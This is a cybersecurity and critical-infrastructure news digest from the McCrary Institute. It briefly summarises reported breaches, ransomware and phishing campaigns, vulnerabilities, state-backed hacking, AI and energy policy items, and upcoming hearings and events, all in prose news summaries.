TODAY'S TOP 5
McCrary Institute for Cyber & Critical Infrastructure Security
Working to protect and advance U.S. interests in the areas of cyber and critical infrastructure security.
CISA SAYS EYE STILL ON RUSSIA: The Department of Homeland Security said that its Cybersecurity and Infrastructure Security Agency will continue to pay attention to Russian cyber threats, contrary to media reports suggesting the opposite, CyberScoop reports. The Guardian?reported last week that a recent CISA memo setting out priorities for the agency didn’t list Russia among them, while including Chinese threats and critical infrastructure protection. It further reported that analysts at the agency were verbally told not to follow or report on Russian cyber threats. “The memo referenced in the Guardian’s ‘reporting’ is not from the Trump Administration, which is quite inconvenient to the Guardian’s preferred narrative,” said Tricia McLaughlin, DHS spokesperson. “CISA remains committed to addressing all cyber threats to U.S. critical infrastructure, including from Russia. There has been no change in our posture or priority on this front.”
IRAN BOTNET TARGETS TELECOMS: A massive botnet comprising more than 30,000 hacked security cameras and network video recorders is being used to launch DDoS attacks against telecom providers and gaming platforms, according to security researchers from Nokia Deepfield and GreyNoise. The botnet, tracked as Eleven11bot, is being used to launch brute force attacks against login systems and exploiting weak and default passwords on IoT devices,?according to GreyNoise. More than 60% of the 1,042 observed IP addresses have been traced to Iran, Cybersecurity Dive reports. GreyNoise does not formally make attributions, but it noted the attacks came days after the Trump administration imposed new sanctions on Iran, extending its “maximum pressure” campaign.
HYBRID AI AND HUMAN RED TEAMS: The new U.S. presidential administration has an opportunity to combine human expertise with AI-powered analysis to identify the potential vulnerabilities of draft tech policies before they are implemented rather than after they have been weaponized by adversaries, according to a Stimson policy memo. Despite the widespread belief among policymakers that geopolitical considerations alone are sufficient when developing technology policies and export controls, this view overlooks three crucial vulnerabilities that pose substantial risks to U.S. national security.
CHINA’S QUEST TO AUTOMATE BATTLE: The drones that fanned out during a recent People’s Liberation Army exercise were dispatched by the Intelligent Precision Strike System, a?new product?from Chinese defense giant Norinco that used the UAVs’ real-time data to model the battlefield, track targets, devise strike plans, distribute firing information, and execute follow-up strikes.?According to the video playing in Norinco’s booth at the most recent Zhuhai Air Show, almost all of this was done autonomously except giving the commands to fire, Defense One reports. Chinese observers also?noted?how the system fused battlefield intelligence from multiple sources. It epitomizes how the PLA aims to ensure dominance in the next era of conflict: with autonomous capabilities that blur the line between human oversight and machine execution.
STATES WEIGH DATA CENTER DEMANDS: Legislators in states where the U.S. data center boom is about to kick into higher gear are considering bills that could force developers to pony up to connect their power-hungry loads to the grid, E&E News reports. Bills in Georgia, California and Virginia, for example, could place more costs of data center infrastructure on developers rather than being borne by ratepayers, addressing a concern that the new loads could raise utility costs. Others would establish new rules regarding how data centers can obtain power. Even lawmakers in Texas — a market long known for its hands-off rules — are considering a bill that would raise costs for data centers and potentially force them to power off during a grid emergency.
CYBER FOCUS PODCAST
In the latest episode of?Cyber Focus, host Frank Cilluffo sits down with SentinelOne Vice President for Government Affairs Andrew Howell and McCrary Institute Deputy Director for Policy and Partnerships Kyle Klein. Together, they discuss the evolving cybersecurity legislative landscape in the early days of the 119th Congress. The conversation covers key bills such as the Cyber PIVOTT Act, updates to the Computer Fraud and Abuse Act, efforts to designate space as critical infrastructure, AI regulation, and cybersecurity funding for state and local governments. They also examine the future direction of the Cybersecurity and Infrastructure Security Agency (CISA) and the broader challenges of supply chain security.
SUBSCRIBE TO CYBER FOCUS:?YouTube?|?Spotify?|?Apple Podcasts
CYBER AND CI UPDATES
ATTACKS AND INCIDENTS
Breaches
Cyberattack launched at Missouri Department of Conservation
A?2022 MDC audit conducted by former Missouri State Auditor Nicole Galloway?pointed out multiple cybersecurity shortfalls within the department, including it not having a fully established department-wide security plan and it having never conducted a comprehensive risk assessment.?Other issues included not removing linked accounts of terminated users, not requiring employees to update their passwords, and not documenting activities in security incident response, reporting, and correction. (KSDK.COM)
Indian stockbroker Angel One discloses data breach
The incident, the company said, was discovered after it received an email alert from a ‘dark web monitoring partner’ on February 27, regarding a ‘data leakage post’. “After analyzing the post, it was ascertained that some of Angel One’s AWS resources were compromised,” the company said. Angel One says it immediately changed the passwords for its AWS cloud and related applications, and that it retained external experts to investigate the incident, assess the scope of the data breach, and identify its root cause. (SECURITYWEEK.COM)
Rubrik rotates authentication keys after log server breach
Rubrik disclosed last month that one of its servers hosting log files was breached, causing the company to rotate potentially leaked authentication keys. The company has confirmed to BleepingComputer that the breach was not a ransomware incident and that it did not receive any communication from the threat actor. Rubrik is a cybersecurity company that specializes in data protection, backup, and recovery?and has over 3,000 employees in more than 22 global offices. The company has over 6,000 customers worldwide, including high-profile companies like AMD, Adobe, Pepsico, Home Depot, Allstate, Sephora, GSK, Honda, Harvard University, and TrelliX. (BLEEPINGCOMPUTER.COM)
Critical infrastructure
Several local governments struggling with cyberattacks limiting services
Government services offered by one of the largest counties in Maryland are still being limited more than a week after it was targeted by a cyberattack.?Anne Arundel County, home to nearly 600,000 people and the state capital of Annapolis, first announced the incident on February 23 and as of Monday is warning residents that multiple services are still down.?911 and 311 call centers are operational but County Executive Steuart Pittman said many other services are impacted by the shutoff of internet access — an action taken to “ensure the safety” of government systems. County officials initially said the attack was “of external origin” and was considered a “multi-day event.” (THERECORD.MEDIA)
Healthcare
Cancer hospital breach is claimed by Qilin gang in new ransomware low
The Qilin ransomware group said it is responsible for the February 10 hack of a prestigious cancer treatment center in Japan, exposing the sensitive health information of 300,000 patients and leaving its hospital system “unusable.” The Utsunomiya Central Clinic (UCC) cancer treatment center first alerted the public to the ransomware attack on its website on February 18th, roughly a week after announcing it was experiencing technical difficulties with its network systems. Located in Utsunomiya city on Japan’s main Honshu island, the clinic stated that once it discovered the breach, it took measures “to disconnect the server from the internet and the hospital's network,” forcing the clinic to limit its medical care services. (CYBERNEWS.COM)
Palau health ministry on the mend after Qilin ransomware attack
The health ministry of the Pacific island nation of Palau has recovered from a ransomware attack launched by a gang known for targeting prominent healthcare institutions.?Palau officials told Recorded Future News that the February 17 ransomware attack launched by hackers connected to a group named Qilin allowed the infiltrators to steal files from IT systems used by the Ministry of Health and Human Services (MHHS). (THERECORD.MEDIA)
Malware
Attackers leverage Microsoft Teams and Quick Assist for access
A sophisticated cyber-attack using social engineering tactics and widely used remote access tools has been uncovered by security researchers at Trend Micro. The attack, which involves a stealthy infostealer malware, grants cybercriminals persistent control over compromised machines and enables them to steal sensitive data. According to Trend Micro Threat Intelligence, most incidents since October 2024 have been concentrated in North America, with 21 breaches recorded. The US was the most affected, with 17 incidents, followed by Canada and the UK, each experiencing five. Europe recorded 18 incidents in total. (INFOSECURITY-MAGAZINE.COM)
Ransomware
Black Basta leader escapes from courtroom in Armenia while awaiting judge's decision
Alleged Black Basta ransomware boss Oleg Nefedov, wanted by Interpol and the US authorities, was arrested in Armenia for 72 hours. The judge struggled to issue a temporary detention decision in time, and the cybercriminal went for a walk and disappeared. Later, the crime ring leader bragged about “very high-level” friends. Intel 471, a cyber threat intelligence company, connected more dots tying the persona of Basta Ransomware gang leader, known as GG (tramp, usernamegg), to Oleg Nefedov. Black Basta’s internal messages were recently?leaked, revealing many intricacies about the ransomware gang's operations. (CYBERNEWS.COM)
Trends
Latin American orgs face 40% more attacks than global average
Cyber threats are accelerating faster in Latin America than anywhere else in the world. The trend has been building for at least a year now, actually. Last summer, Check Point tracked a?53% year-over-year rise in weekly cyberattacks?against organizations in the region, followed at a distance by Africa (37%) and Europe (35%). Today, the cybersecurity company reports,?Latin American companies suffer 2,569 attacks per week?on average — nearly 40% more than the global average of 1,848. (DARKREADING.COM)
THREATS
Phishing
Hackers exploit AWS misconfigurations to launch phishing attacks via SES and WorkMail
Threat actors are targeting Amazon Web Services (AWS) environments to push out phishing campaigns to unsuspecting targets, according to findings from Palo Alto Networks Unit 42. The cybersecurity company is tracking the activity cluster under the name?TGR-UNK-0011?(short for a?threat group with unknown motivation), which it said overlaps with a group known as JavaGhost. TGR-UNK-0011 is known to be active since 2019. "The group focused historically on defacing websites," security researcher Margaret Kelley?said. "In 2022, they pivoted to sending out phishing emails for financial gain." (THEHACKERNEWS.COM)
New ClickFix attack deploys Havoc C2 via Microsoft Sharepoint
A newly uncovered ClickFix phishing campaign is tricking victims into executing malicious PowerShell commands that deploy?the Havok post-exploitation framework for remote access to compromised devices. ClickFix is a social-engineering tactic that emerged last year, where threat actors create websites or phishing attachments that display fake errors and then prompt the user to click a button to fix them. Clicking the button will copy a malicious PowerShell command into the Windows clipboard, which users are then prompted to paste into a command prompt to "fix" the error. However, as expected, the malicious PowerShell command will instead execute a script hosted on a remote site that downloads and installs malware on the devices. (BLEEPINGCOMPUTER.COM)
Vulnerabilities
Android security update contains 2 actively exploited vulnerabilities
The most severe of the flaws under active exploitation, CVE-2024-43093, carries a CVSS score of 7.8 and was added to the Cybersecurity and Infrastructure Security Agency’s known exploited vulnerabilities catalog in November. The Android framework privilege escalation vulnerability allows attackers to gain local escalation of privilege without additional execution privileges, but requires user interaction for exploitation.?(CYBERSCOOP.COM)
Hackers exploit Paragon Partition Manager driver vulnerability in ransomware attacks
Threat actors have been exploiting a security vulnerability in Paragon Partition Manager's BioNTdrv.sys driver in ransomware attacks to escalate privileges and execute arbitrary code. The zero-day flaw (CVE-2025-0289) is part of a set of five vulnerabilities that was discovered by Microsoft, according to the CERT Coordination Center (CERT/CC). "These include arbitrary kernel memory mapping and write vulnerabilities, a null pointer dereference, insecure kernel resource access, and an arbitrary memory move vulnerability," CERT/CC?said. (THEHACKERNEWS.COM)
ADVERSARIES
North Korea
North Korean IT workers hide their IPs using Astrill VPN
Security researchers have uncovered new evidence that North Korean threat actors, particularly the Lazarus Group, are actively using Astrill VPN to conceal their true IP addresses during cyberattacks and fraudulent IT worker schemes. Silent Push, a cybersecurity firm, recently acquired infrastructure and logs from the Lazarus subgroup known as “Contagious Interview” or “Famous Chollima,” confirming the ongoing use of Astrill VPN in their operations. The investigation revealed that the threat actors registered the domain “bybit-assessment[.]com” hours before the $1.4 billion ByBit cryptocurrency heist, using an email address previously linked to?Lazarus Group?activities. (GBHACKERS.COM)
Kimsuky’s new campaign uses RDP Wrapper for remote access
The notorious North Korean-backed cybercriminal organization Kimsuky uses a custom-built RDP Wrapper in its latest campaign. The group also pairs this tactic with proxy tools to acquire direct access to infected networks. Researchers also claim that this new activity from this particular group shows that they have shifted their infection tactics. North Korean hackers now utilize various specialized remote access tools rather than noisy backdoors such as PebbleDash, which are still in use. The current infection chain begins with a?spear-phishing?email with a malicious shortcut file attachment disguised as a PDF or Word document. (IZOOLOGIC.COM)
GOVERNMENT AND INDUSTRY
Artificial intelligence
AI versus the brain and the race for general intelligence
There's no question that AI systems have accomplished some impressive feats, mastering games, writing text, and generating convincing images and video. That's gotten some people talking about the possibility that we're on the cusp of AGI, or artificial general intelligence. While some of this is marketing fanfare, enough people in the field are taking the idea seriously that it warrants a closer look. Many arguments come down to the question of how AGI is defined, which people in the field can't seem to agree upon. This contributes to estimates of its advent that range from "it's practically here" to "we'll never achieve it." Given that range, it's impossible to provide any sort of informed perspective on how close we are. (ARSTECHNICA.COM)
How can we take AI to the edge of possibility?
In a lab in Singapore, an artificial intelligence (AI) algorithm accelerates cancer detection, helping doctors pinpoint malignant cells with unprecedented speed and accuracy. On a farm in Kenya, AI-powered sensors analyse soil conditions in real time, guiding farmers towards precision irrigation that boosts crop yields while conserving water. Meanwhile, in the Arctic, machine learning models process satellite imagery to track ice sheet changes, giving scientists an early warning system for rising sea levels. These breakthroughs highlight a truth often overlooked: AI’s transformative power extends far beyond chatbots and virtual assistants – it holds the key to solving some of the world’s most pressing challenges. Yet, our collective focus remains narrow, fixated on generative AI’s immediate conveniences rather than its deeper potential to reshape entire industries and societies. (WEFORUM.ORG)
Researchers surprised to find less-educated areas adopting AI writing tools faster
Since the?launch of ChatGPT?in late 2022, experts have debated how widely AI language models would impact the world. A few years later, the picture is getting clear. According to?new Stanford University-led research?examining over 300 million text samples across multiple sectors, AI language models now assist in writing up to a quarter of professional communications across sectors. It's having a large impact, especially in less-educated parts of the United States. (ARSTECHNICA.COM)
Energy
New England, New York grid operators prepare to collect millions in tariffs on Canadian electricity
The tariff on Canadian energy resources?is part of a broader set of duties on imports President Trump announced in January and subsequently paused for 30 days. The two countries “have one of the most integrated international electric grids in the world,” New York ISO told FERC. The tariffs could add millions of dollars to customer bills. The grid operators say they don’t believe they have a role in collecting or remitting the duties. “However, given the uncertainty surrounding these issues, the ISO deemed it necessary to make this filing,” ISO New England said.?(UTILITYDIVE.COM)
ALSO: Ontario will cut off U.S. electricity exports 'with a smile on my face,' premier says (TORONTOSUN.COM)
After Moss Landing, what’s next for battery storage?
Energy storage experts note that the Moss Landing facility was housed indoors and used a type of battery more prone to thermal runaway, among other potential safety issues. Utility-scale lithium-ion battery installations’ overall safety track record is impressive, with just 20 fire-related incidents over the past decade despite a 25,000% increase in installed capacity since 2018, a spokesperson for the American Clean Power Association told Utility Dive last month. But the Moss Landing incident has nevertheless focused utilities, regulators and lawmakers attention on lithium-ion battery safety. It could also create an opening for non-lithium energy storage technologies to compete, some experts say. (UTILITYDIVE.COM)
Leadership
Katie Arrington named acting Pentagon CIO
Mere weeks after being named the chief information security officer for the Defense Department, Katie Arrington was announced Monday as the Pentagon’s official “Performing the Duties of the Department of Defense Chief Information Officer.” The DOD Office of the CIO announced the move by Secretary of Defense Pete Hegseth to place Arrington as the acting CIO?in a post on LinkedIn.?The post also confirmed that Leslie Beavers, who had been acting CIO since John Sherman?left the role last June, will return to her primary role as principal deputy CIO. (DEFENSESCOOP.COM)
Social media
ICO launches TikTok investigation over use of children’s data
The UK’s privacy regulator has launched an investigation into TikTok, Reddit and Imgur?after expressing concerns over the way the sites use children’s personal information. The Information Commissioner’s Office (ICO) revealed the news this morning, claiming that “recommender systems,” on the sites could lead to vulnerable youngsters being served inappropriate or harmful content.?In the case of Imgur and Reddit, the regulator is looking at how the platforms use children’s personal information and their use of age assurance measures,?which estimate or verify a child’s age in order for age-appropriate content to be served to them. (INFOSECURITY-MAGAZINE.COM)
Space
NOAA terminates space, climate and marine life advisory committees
The Trump administration is disbanding expert advisory committees focused on space, climate, coastal area management and marine fisheries after?the agency they were designed to assist said they are no longer necessary.?The National Oceanic and Atmospheric Administration is ending the committees because they “have served their purpose and should be terminated,” Nancy Hann, the agency’s deputy undersecretary for operations, said in a memorandum obtained by?Government Executive.?The terminations follow an executive order from President Trump?requiring agencies to do away with?any federal advisory committees not required by law.?(NEXTGOV.COM)
Transportation
AI is telling New York subway workers if that suspicious sound is a problem
The?Metropolitan Transportation Authority, responsible for managing public transit across New York City, launched a pilot program last Thursday that uses a prototype developed by Google Public Sector to detect potential track issues by using sensors and artificial intelligence. Called TrackInspect, the program attached Google Pixel consumer smartphones with built-in sensors and attached microphones onto subway cars in order to capture vibrations and sound patterns — such as suspicious rattles, bangs or squeals — as trains moved throughout the subway system. (STATESCOOP.COM)
LEGISLATIVE UPDATES
HEARINGS
AIR SAFETY: The House Committee on Transportation and Infrastructure will hold a hearing March 4 on the country’s air traffic control system infrastructure and staffing.?
ONLINE EXTREMISM: The House Homeland Security Subcommittee on Counterterrorism and Intelligence will hold a March 4 hearing on how terrorists use the internet and online networks for recruitment and radicalization.
CHINA’S TYPHOONS: The House Select Committee on the Chinese Communist Party will hold a hearing March 5 on how to deter Beijing’s cyber actions and enhance America’s cyber defenses.
CHINA THREATS: The House Homeland Security Committee will hold a March 5 hearing on countering threats posed by the Chinese Communist Party to U.S. security.
EVENTS
QUANTUM: Former Director of the National Security Agency (NSA) and Commander of U.S. Cyber Command,?Adm. Michael Rogers USN (Ret.)?will discuss how the United States can position itself as a global leader in quantum technologies at a March 4 CSIS event.
SPACE SECURITY: Chatham House’s 2025 Space Security Conference online and in person on March 5 convenes policymakers and leaders from the private sector, multilateral organizations, academia and NGOs for a day of high-level interactive discussions examining conflict, competition and cooperation in outer space.?
AI ENERGY: The CSIS Energy Security and Climate Change Program will host a March 5 conversation with?Vivian Lee, Managing Director and Partner at Boston Consulting Group (BCG) and?Shanu Mathew, Portfolio Manager and Research Analyst at Lazard Asset Management. Vivian and Shanu will discuss the state of AI electricity demand, the implications of DeepSeek, the trend towards colocation, prospects for nuclear, and other key dynamics at the intersection of AI and electricity.
AI@AU: Four artificial intelligence experts from industry and academia will offer deeper insight into the emerging technology and its best practices through a lecture series, presented by Auburn University’s AI@AU initiative. The “Spring 2025 AI@AU Forum” will be March 7, March 14, April 11 and April 25 (all Fridays at 10 a.m.) in Lowder Hall, Room 127, or can be viewed live via Zoom. Recorded lectures will also be available.
CYBER SUMMIT: The Billington State and Local CyberSecurity Summit will be held March 10-12 at the Ronald Reagan Building in Washington, D.C. On?Monday, March 10, Billington CyberSecurity will partner with StateRAMP in hosting the 2025 StateRAMP Symposium on Cybersecurity Framework Harmonization.?The State and Local CyberSecurity Summit’s programming and exhibit hall conversations take place on?Tuesday, March 11, and Wednesday, March 12.?
NUCLEAR: Registration for the Nuclear Regulatory Commission’s 37th annual Regulatory Information Conference is open. The RIC will be held March 11-13 in North Bethesda, Maryland, and online.
CYBER CHALLENGE: The Atlantic Council’s Cyber Statecraft Initiative, in partnership with?American University’s School of International Service and Washington College of Law, will hold the fourteenth annual?Cyber 9/12 Strategy Challenge?in Washington, DC?on?March 14-15. This event will be held in a hybrid format, meaning teams are welcome to attend either virtually via Zoom, or in-person at?American University’s Washington College of Law. The agenda and format will look very similar to past Cyber 9/12 Challenges, except that it will be held in a hybrid format. Plenary sessions will be livestreamed via Zoom.
AI FAILS: By some estimates, more than 80 percent of AI projects fail. That’s twice the rate of failure for IT projects that don't involve AI. RAND's James Ryseff talked to experienced data scientists and machine learning engineers to uncover five root causes that lead to AI failures—and what can be done to minimize these issues. He’ll discuss the findings in a March 26 webinar.?
DEFENSE TECH: On?March 27?the Atlantic Council’s?Forward?Defense?Program will publicly launch the final report of the?Commission on Software-Defined Warfare.?This new report presents a software-defined warfare approach, offering recommendations for the DoD to adopt modern software practices and seamlessly integrate them into existing platforms to enhance and strengthen defense strategies. Speakers will include former Defense Secretary Mark Esper and former Under Secretary of Defense for Acquisition and Sustainment Ellen Lord.?
FOLLOW THE McCRARY INSTITUTE ON LINKEDIN | X | FACEBOOK
SUBSCRIBE TO THE CYBER FOCUS PODCAST:?YOUTUBE?|?SPOTIFY?|?APPLE PODCASTS